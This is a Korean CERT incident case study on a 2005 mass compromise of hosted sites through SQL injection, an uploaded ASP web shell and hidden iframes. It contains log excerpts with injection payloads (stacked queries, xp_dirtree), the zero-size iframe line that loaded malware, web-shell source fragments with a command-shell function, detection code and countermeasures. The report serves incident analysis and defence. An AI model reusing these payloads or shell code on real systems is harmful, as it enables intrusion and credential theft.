[Source: Korea Information Security Agency (KISA)]
KrCERT-IN-2005-012 http://www.krcert.or.kr
Incident Case Study: Malicious Code Distribution Sites Created through Web Hacking cert@krcert.or.kr
KISC
Internet Incident Response Support Center
1. Overview
Recently, domestic web sites have been hacked so that ordinary PC users become infected with malicious code merely by visiting a compromised site, and their online game credentials are then leaked.
These incidents appear to be causing widespread damage across vulnerable domestic sites following the public release of an automated attack tool presumed to have been written in China.
Most of the hacked web sites with malicious code inserted were running the IIS web server on the Windows 2000 Server platform and used an MS-SQL database.
In June 2005, customer sites hosted by a domestic web hosting company were also hacked and malicious code was inserted into their front pages.
Incident analysis showed that the attack originated from an IP address allocated to China, and the attack process appears to have been as follows.
① Search for pages where SQL injection is possible through user input or URL argument values
② Carry out SQL injection attacks against the vulnerable page
- Using an automated attack tool, query the MS-SQL server remotely and retrieve the results
③ Upload a malicious ASP file that provides a shell and other functions through a web browser
④ Use the uploaded malicious ASP file to insert malicious code (an added iframe) into the index files (index.html, etc.)
This report examines the above attack method in more detail by analyzing the web logs of the victim system and the attack tools left behind by the attacker.
It also tests an attack tool obtained from the Internet and reviews measures web administrators can take to prevent and respond to such attacks.
2. Overview of the victim system
1) Operating system: Windows 2000 Server (Microsoft-IIS/5.0, MS-SQL)
2) System purpose: web hosting (205 sites in operation)
3) Security status
- Security patches for Windows Server and IIS were applied to the system regularly, but no additional security equipment such as a firewall was in use.
3. Damage
Malicious code using an iframe tag had been inserted into the front pages (index.html) of the 205 sites operating on the victim system.
However, so that the hack could not be noticed from the page as displayed, the frame used for the attack was set to a size of 0.
<iframe src ="http://www.xxx.xx.xx/123/123/index.htm" name ="A" width="0" frameborder="0">
When an Internet user whose PC lacks security patches connects to such a site, malicious code is installed on the PC and sends the user's ID and password for a particular domestic online game to an e-mail address in China.
4. Analysis of the damage
□ Attack attempts from an IP address allocated to China
The IIS web logs of the victim system show various attacks from an IP address allocated to China (xxx.48.81.xx).
route: xxx.48.0.0/16
descr: CHINA NETWORK COMMUNICATION
origin: AS4814
mnt-by: MAINT-AS4814
changed: ttong@publicf.bta.net.cn 20030818
source: SAVVIS
Thousands of attack-related log entries remained from this IP range; some were the result of manual attacks, but most appear to have been left by an automated attack tool.
□ Traces of SQL injection attacks
The attacker appears to have crawled the web site looking for pages where SQL injection was possible. On the victim system, SQL statements were entered into the argument value of a post on the notice board. Several hundred log entries similar to those below appeared within a short time, which suggests an automated tool.
ex050611.log:2005-06-11 17:23:02 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529'|27|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Unclosed_quotation_mark_before_the_character_st
ring_''. 500 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:23:14 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp id=529 200
Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:23:17 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529%20and%20user%2Bchar(124)=0|27|80040e07|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Syntax_error_conve
rting_the_nvarchar_value_'victim|'_to_a_column_of_data_type_int. 500 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:23:20 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp id=529;declare%20@a%20int--
200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:23:20 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529%20and%20(Select%20count([name])%20from%20[master]..[sysobjects])>=0 200 Microsoft+URL+Control+-+6.00.8862
Again using the SQL injection vulnerability in the board post, the attacker browsed the file system.
The following log entries show the attacker creating a database table named bb and executing xp_dirtree, an extended stored procedure provided by MS-SQL. xp_dirtree lists all subdirectories beneath a given path; the attacker used it to list the contents of C:\.
ex050611.log:2005-06-11 17:23:33 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DROP%20TABLE%20bb;CREATE%20TABLE%20bb(subdirectory%20nvarchar(256)%20NULL,depth%20tinyint%20NUL
L,[file]%20bit%20NULL)-- 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:23:34 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'C:\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
The attacker can be seen descending into the subdirectories of the victim site and inspecting its files.
These entries were most likely not produced by hand but by a tool that can browse the file system.
ex050611.log:2005-06-11 17:23:34 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'C:\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:24:06 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'd:\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:29:18 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'd:\victim\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:29:29 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'd:\victim\html\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:33:05 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'd:\victim\html\admin\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:34:03 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'd:\victim\html\admin\data\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:34:31 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'd:\victim\html\admin\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
□ Traces of attacks on the administrator page
The attacker attempted to reach the administrator login page. After guessing the path of the web administrator page, the attacker tried to bypass the administrator login and go directly to an editing page that requires administrator privileges.
ex050611.log:2005-06-11 17:41:16 xxx.48.81.23 - victim_IP 80 POST /admin/adminok.asp - 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:41:23 xxx.48.81.23 - victim_IP 80 GET /admin/administrator/admin.asp - 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:41:34 xxx.48.81.23 - victim_IP 80 GET /admin/administrator/admin.asp
mode=update&no=4&status=D 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:41:40 xxx.48.81.23 - victim_IP 80 GET /admin/administrator/adminedit.asp no=4 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
The administrator login page of the victim site had a name anyone could guess (admin), and no IP-based access control was in place, so it was in a vulnerable state. The figure below shows the login screen of the victim site's administrator page.
Log entries suggesting attacks on the administrator page remained not only from the IP address allocated to China but also from domestic addresses. The administrator page shown below was accessed repeatedly, about ten times in a row, which points to password guessing against the administrator account or a SQL injection attack.
ex050616.log:2005-06-16 15:28:54 xxx.xxx.xx.202 - victim_IP 80 POST /admin/adminok.asp - 302
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 15:28:54 xxx.xxx.xx.202 - victim_IP 80 GET /admin/index.html - 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 15:28:59 xxx.xxx.xx.202 - victim_IP 80 POST /admin/adminok.asp - 302
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 15:28:59 xxx.xxx.xx.202 - victim_IP 80 GET /admin/index.html - 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
□ Malicious ASP file upload and web page editing
At the time of the incident analysis, ASP files used for the attack had been uploaded to a directory to which only the web administrator should have been able to upload image files.
The following figure shows ok7.asp, one of the ASP files uploaded by the attacker, executed in a web browser.
The interface of this ASP file was in Chinese; the source code below shows that it gives the attacker functions to view, download, delete, edit, copy and move files and folders on the victim server, upload files, obtain a CMD.EXE shell, manage the MS-SQL database, and query server information. It was presumably with this tool that the iframe tag was inserted into the index.html files.
Select Case Action
Case "MainMenu":MainMenu()
Case "ShowFile"
Set ABC=New LBF:ABC.ShowFile(Session("FolderPath")):Set ABC=Nothing
Case "DownFile":DownFile FName:ShowErr()
Case "DelFile"
Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
Case "EditFile"
Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
Case "CopyFile"
Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
Case "MoveFile"
Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
Case "DelFolder"
Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
Case "CopyFolder"
Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
Case "MoveFolder"
Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
Case "NewFolder"
Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
Case "UpFile":UpFile()
Case "CmdShell":CmdShell()
Case "Logout":Session.Contents.Remove("webadmin"):Response.Redirect URL
Case "CreateMdb":CreateMdb FName
Case "CompactMdb":CompactMdb FName
Case "DbManager":DbManager()
Case "Course":Course()
Case "ServerInfo":ServerInfo()
Case Else MainForm()
End Select
...
Function CmdShell()
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "cmd.exe"
...
function FullDbStr(i){
if(i<0){
return false;
}
Str = new Array(12);
Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=<%=RePath(Session("FolderPath"))%>\\db.mdb;Jet
OLEDB:Database Password=***";
Str[1] = "Driver={Sql Server};Server=<%=ServerIP%>,1433;Database=DbName;Uid=sa;Pwd=****";
Str[2] = "Driver={MySql};Server=<%=ServerIP%>;Port=3306;Database=DbName;Uid=root;Pwd=****";
Str[3] = "Dsn=DsnName";
Str[4] = "SELECT * FROM [TableName] WHERE ID<100";
Str[5] = "INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')";
Str[6] = "DELETE FROM [TableName] WHERE ID=100";
Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";
Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
Str[9] = "DROP TABLE [TableName]";
...
The IIS web logs contained traces of files on the victim system being edited through these malicious ASP files.
The log entries below show access to ok7.asp from an IP block belonging to a domestic telecom carrier, listing the victim system's files, uploading a particular file, and editing a particular file.
ex050616.log:2005-06-16 16:18:03 xxx.xxx.xx.202 - victim_IP 80 GET /gallery/ok7.asp Action=MainMenu 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 16:18:04 xxx.xxx.xx.202 - victim_IP 80 GET /gallery/ok7.asp Action=ShowFile 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 16:18:41 xxx.xxx.xx.202 - victim_IP 80 GET /gallery/ok7.asp Action=CmdShell 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 16:20:11 xxx.xxx.xx.202 - victim_IP 80 GET /gallery/ok7.asp Action=UpFile 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 16:21:05 xxx.xxx.xx.202 - victim_IP 80 POST /gallery/ok7.asp Action=UpFile&Action2=Post 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 16:21:07 xxx.xxx.xx.202 - victim_IP 80 GET /gallery/ok7.asp Action=ShowFile 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 16:21:25 xxx.xxx.xx.202 - victim_IP 80 GET /gallery/ok7.asp Action=EditFile 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
In addition, files were also modified from the IP address allocated to China using news2.asp, sent.asp and similar files in the image upload directory.
ex050611.log:2005-06-11 17:43:49 xxx.48.81.23 - victim_IP 80 GET /gallery/gimage/°æ±â?å¸é.jpg - 200
Mozilla/4.0+(compatib+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:43:49 xxx.48.81.23 - victim_IP 80 GET /gallery/gimage/°æ±â횁ø횉횪+½횋횈횉µé+±â
³ä횄횚¿µ1.(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:44:29 xxx.48.81.23 - victim_IP 80 GET /gallery/gimage/news2.asp - 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:56:38 xxx.48.81.23 - victim_IP 80 POST /gallery/gimage/news2.asp
u=execute(application(%22fileContent%22))&pageName=fso&theAct=upload&thePath=D%3A\victim\html\&theFile=C:\Doc
uments%20and%20Settings\Administrator\횞?횄æ\횊üþ\severWrite=false&fileName=D:\victim\html\ 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:56:46 xxx.48.81.23 - victim_IP 80 GET /gallery/gimage/news2.asp
u=execute(application(%22fileContent%22))&pageName=fso&thePath=D:\victim\html\ 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 18:08:27 xxx.48.81.23 - victim_IP 80 GET /sent.asp
pageName=FsoFileExplorer&theAct=showEdit&thePath=D%3A%5Cagency1%5Chtml%5Cindex%2Ehtm 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 18:08:34 xxx.48.81.23 - victim_IP 80 POST /sent.asp
pageName=FsoFileExplorer&theAct=showEdit&thePath=D%3A%5Cagency1%5Chtml%5Cindex%2Ehtm 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 19:11:28 xxx.48.81.23 - victim_IP 80 GET /sent.asp
pageName=FsoFileExplorer&theAct=showEdit&thePath=D%3A%5Chmcadmin%5Chtml%5Cindex%2Easp 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
□ Creation of an unauthorized user account
An unauthorized user account named kyo had been created on the victim system. The account belonged to the Administrators group, so malicious actions with system administrator privileges were possible, and hacking programs were found in the account's directory.
The log entries below also show that the malicious ASP file examined above (ok7.asp) was accessed as the kyo account from the IP address xxx.xxx.xx.203.
ex050616.log:2005-06-16 14:02:02 xxx.xxx.xx.203 - victim_IP 80 GET /gallery/ok7.asp kyo 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+i-NavFourF)
ex050616.log:2005-06-16 14:02:10 xxx.xxx.xx.203 - victim_IP 80 POST /gallery/ok7.asp - 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+i-NavFourF)
ex050616.log:2005-06-16 14:02:21 xxx.xxx.xx.203 - victim_IP 80 GET /gallery/ok7.asp kyo 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+i-NavFourF)
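The log patterns walked through in this section (the ODBC error and stacked-query traces under "Traces of SQL injection attacks", the repeated POSTs to the administrator login page, and the Action= requests to the uploaded web shell) can be turned into triage rules for IIS logs. The following Python is an added example and not part of the report or the victim system; its log lines and addresses are constructed, and the W3C field order is assumed to match the report's excerpts.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Payload fragments from the report's injection traffic, matched after URL decoding.
SQLI_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"'", r";\s*declare\s+@", r"\bxp_\w+", r"sysobjects",
    r"\b(drop|create)\s+table\b", r"\bchar\(\d+\)")]
# ODBC error text that IIS writes into the query field of a 500 response.
ODBC_ERROR = re.compile(r"80040e[0-9a-f]{2}|ODBC_SQL_Server_Driver", re.IGNORECASE)
# Action= values of the ok7.asp web shell quoted in the report.
WEBSHELL_ACTIONS = {"ShowFile", "CmdShell", "UpFile", "EditFile", "DbManager", "ServerInfo"}
ADMIN_PAGE = re.compile(r"^/admin/.*\.asp$", re.IGNORECASE)

def parse_line(line):
    """Split one IIS W3C log line (optionally 'file:'-prefixed as grep prints it)."""
    first = line.split(" ", 1)[0]
    if ".log:" in first:
        line = line.split(":", 1)[1]
    f = line.split()
    if len(f) < 10:
        return None
    return {"time": f[1], "client": f[2], "method": f[6], "stem": f[7],
            "query": unquote(f[8]), "status": f[9]}

def classify(rec):
    """Return the names of the per-request rules that fire for one record."""
    hits, q = [], rec["query"]
    if rec["status"] == "500" and ODBC_ERROR.search(q):
        hits.append("sql-error-leak")          # verbose driver error reached the client
    if any(p.search(q) for p in SQLI_PATTERNS):
        hits.append("sqli-payload")
    action = re.search(r"(?:^|&)Action=(\w+)", q)
    if rec["stem"].lower().endswith(".asp") and action and action.group(1) in WEBSHELL_ACTIONS:
        hits.append("webshell-action")
    return hits

def triage(lines, login_threshold=3):
    """Apply per-request rules, then flag clients that POST repeatedly to admin pages."""
    findings = defaultdict(list)
    admin_posts = Counter()
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        for rule in classify(rec):
            findings[rule].append((rec["client"], rec["time"], rec["stem"]))
        if rec["method"] == "POST" and ADMIN_PAGE.match(rec["stem"]):
            admin_posts[rec["client"]] += 1
    for ip, n in sorted(admin_posts.items()):
        if n >= login_threshold:
            findings["admin-login-hammering"].append((ip, n))
    return dict(findings)

# Constructed sample lines modelled on the report's excerpts (TEST-NET addresses).
SAMPLE_LOG = """\
ex050611.log:2005-06-11 17:23:02 203.0.113.23 - 10.0.0.5 80 GET /announce/new_detail.asp id=529'|27|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Unclosed_quotation_mark 500 Mozilla/4.0
ex050611.log:2005-06-11 17:23:14 203.0.113.23 - 10.0.0.5 80 GET /announce/new_detail.asp id=529 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:23:20 203.0.113.23 - 10.0.0.5 80 GET /announce/new_detail.asp id=529;declare%20@a%20int-- 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:23:34 203.0.113.23 - 10.0.0.5 80 GET /announce/new_detail.asp id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'C:\\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
ex050616.log:2005-06-16 15:28:54 198.51.100.202 - 10.0.0.5 80 POST /admin/adminok.asp - 302 Mozilla/4.0
ex050616.log:2005-06-16 15:28:59 198.51.100.202 - 10.0.0.5 80 POST /admin/adminok.asp - 302 Mozilla/4.0
ex050616.log:2005-06-16 15:29:03 198.51.100.202 - 10.0.0.5 80 POST /admin/adminok.asp - 302 Mozilla/4.0
ex050616.log:2005-06-16 16:18:41 198.51.100.202 - 10.0.0.5 80 GET /gallery/ok7.asp Action=CmdShell 200 Mozilla/4.0
ex050616.log:2005-06-16 16:30:00 192.0.2.7 - 10.0.0.5 80 GET /announce/new_detail.asp id=530 200 Mozilla/4.0
"""

def run_sample():
    """Run the rules over the constructed sample; a real run would feed ex*.log lines."""
    return triage(SAMPLE_LOG.splitlines())
```

On the sample, only the benign id=529 and id=530 requests pass without a finding.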
5. Web server attack tools presumed to have been made in China
The attacks on IIS web servers occurring recently are widespread because automated attack tools are being shared among attackers.
In particular, tools and techniques for SQL injection attacks against MS-SQL servers are being shared on Chinese hacking-related sites.
The figure below shows one of the attack tools, presumed to have been made in China, that is publicly available on the Internet. When it was tried against the victim system of this incident, the SQL injection attack succeeded easily and the administrator account and password stored in the database were exposed.
The attack used the SQL injection vulnerability in the notice board argument that was recorded in the victim system's logs.
Many SQL injection tools similar to the one above, and tools for obtaining a shell through the web, exist on the Internet, so web administrators should be alert.
6. Security countermeasures
Attacks from IP addresses allocated to China have been increasing recently, and with the public release of various hacking tools presumed to have been written by Chinese hackers, large-scale attacks may occur, so domestic web site administrators should be alert.
As the analysis of this incident shows, the attacker used a SQL injection vulnerability in user input or URL argument values to attack the MS-SQL database server. This cannot be solved by security patches for the system or web application alone; when developing a web site in-house, security must be considered from the design and development stages. In this incident, too, the web hosting company applied security patches to the system itself regularly, but the customer's web site running on it contained a security weakness, SQL injection, and was attacked through it.
To prevent a recurrence of incidents like this one, the following countermeasures are required.
□ Validate user input (remove SQL injection vulnerabilities)
The most fundamental cause of this incident was that user input and URL argument values arriving by various paths were not validated. Therefore, to defend against SQL injection attacks, validation of user input and URL argument values must come first.
o Inspect every parameter of the scripts that interact with the database and modify them so that user input cannot cause SQL injection.
o To keep user input from causing SQL injection, check at input time whether it contains special characters (' " / \ ; : space -- + etc.) or SQL syntax (union, select, insert, etc.), and treat input containing disallowed strings or characters as an error.
o Configure the SQL server's error messages so they are not shown to users. By analyzing the returned error messages, an attacker can work out a SQL injection string that will succeed. Therefore, do not expose SQL server error messages externally.
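As an added illustration of this countermeasure (not code from the report or the victim site), the following Python contrasts the concatenated lookup that made new_detail.asp injectable with an allow-listed, parameter-bound lookup that also hides driver errors; sqlite3 stands in for MS-SQL, an assumption made so the example runs offline.

```python
import re
import sqlite3

# Allow-list for the notice id: a short decimal integer and nothing else. Quotes,
# ';', '--', 'declare', 'xp_dirtree' and every other payload in the report fail this.
ID_PATTERN = re.compile(r"^[0-9]{1,9}$")

class BadRequest(Exception):
    """Validation or lookup failure; the handler answers with a generic error page."""

def validate_id(raw):
    """Accept only a decimal integer; anything else is rejected before touching SQL."""
    if raw is None or not ID_PATTERN.match(raw):
        raise BadRequest("invalid id")
    return int(raw)

def fetch_notice_vulnerable(conn, raw_id):
    """The pattern behind the incident: the URL argument is pasted into the SQL text."""
    row = conn.execute("SELECT title FROM notice WHERE id=" + raw_id).fetchone()
    return row[0] if row else None

def fetch_notice(conn, raw_id):
    """Hardened lookup: validate first, then bind the value so it cannot alter the statement."""
    nid = validate_id(raw_id)
    try:
        row = conn.execute("SELECT title FROM notice WHERE id=?", (nid,)).fetchone()
    except sqlite3.Error:
        # Do not echo the driver's message; the report shows ODBC errors leaking to the client.
        raise BadRequest("lookup failed")
    return row[0] if row else None

def is_rejected(conn, raw_id):
    """True when the hardened path refuses the request (used to check payloads)."""
    try:
        fetch_notice(conn, raw_id)
    except BadRequest:
        return True
    return False

def make_db():
    """Constructed in-memory table standing in for the notice-board table (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notice (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO notice VALUES (529, 'Service notice')")
    return conn
```

With the vulnerable lookup an id of "0 OR 1=1" still returns a row; with the hardened lookup the same input, and every payload from the logs above, is refused before any query runs.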
□ Remove unnecessary extended stored procedures
Remove the extended stored procedures provided by MS-SQL Server that are not in use. Procedures such as xp_cmdshell, xp_regread and xp_dirtree can be used by an attacker, so it is advisable to remove them where possible.
□ Prohibit remote execution on the SQL server
Disable 'ad-hoc' queries, which allow the database to be queried from a remote location. Ad-hoc queries are made possible by functions such as OPENROWSET, and the feature can be blocked by editing the registry.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\Microsoft.Jet.OLEDB.4.0]
"DisallowAdhocAccess"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\MSDAORA]
"DisallowAdhocAccess"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\MSDASQL]
"DisallowAdhocAccess"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB]
"DisallowAdhocAccess"=dword:00000001
An incorrect registry edit can cause the system to malfunction, so proceed carefully, referring to the following Microsoft document on disabling ad-hoc queries.
http://support.microsoft.com/default.aspx?scid=kb;ko;256052
□ Inbound/outbound traffic filtering
Filter traffic to the SQL server using IPSec, routers, firewalls and the like. Although it depends on the environment in which the system operates, block direct connections to the SQL server's 1433/TCP and 1434/UDP. Also block unnecessary outbound connections from the SQL server so that reverse connections by an attacker can be prevented.
□ Periodic log inspection
As the analysis of this incident shows, recent incidents leave traces of SQL attacks and the attacker's actions in the IIS web logs. Web server administrators should therefore inspect the logs periodically to confirm whether an attacker has intruded and to look for weak points.
□ Access control for the administrator page
Change the address of the administrator login page to a name that is hard to guess, and do not use guessable names such as the following for the administrator page.
http://admin.victim.com
http://www.victim.com/admin/
http://www.victim.com/manager/
http://www.victim.com/master/
http://www.victim.com/system/
Also, apply IP-based access control so that the site's administrator page can be reached only from the administrator's PC.
On an IIS web server, access to the administrator page can be restricted as follows.
․ Select Settings → Control Panel → Administrative Tools → Internet Services Manager
․ Right-click the administrator page folder and click Properties → Directory Security → IP Address and Domain Name Restrictions → Edit
․ Select Denied Access, click Add, and register the administrator's host IP address or subnet
Various other vulnerabilities can arise during web site development, so it is advisable to consult the "Web Site Development Security Guide" produced by KISA and address them.
o Web Site Development Security Guide download:
http://www.kisa.or.kr/news/2005/announce_20050427_submit.html
In particular, recent hacking is no longer mere web site defacement but is developing into hacking for financial gain, such as leaking game passwords and financial information. Hacking techniques are accordingly becoming more sophisticated, and web site administrators should pay particular attention to the security measures on their sites.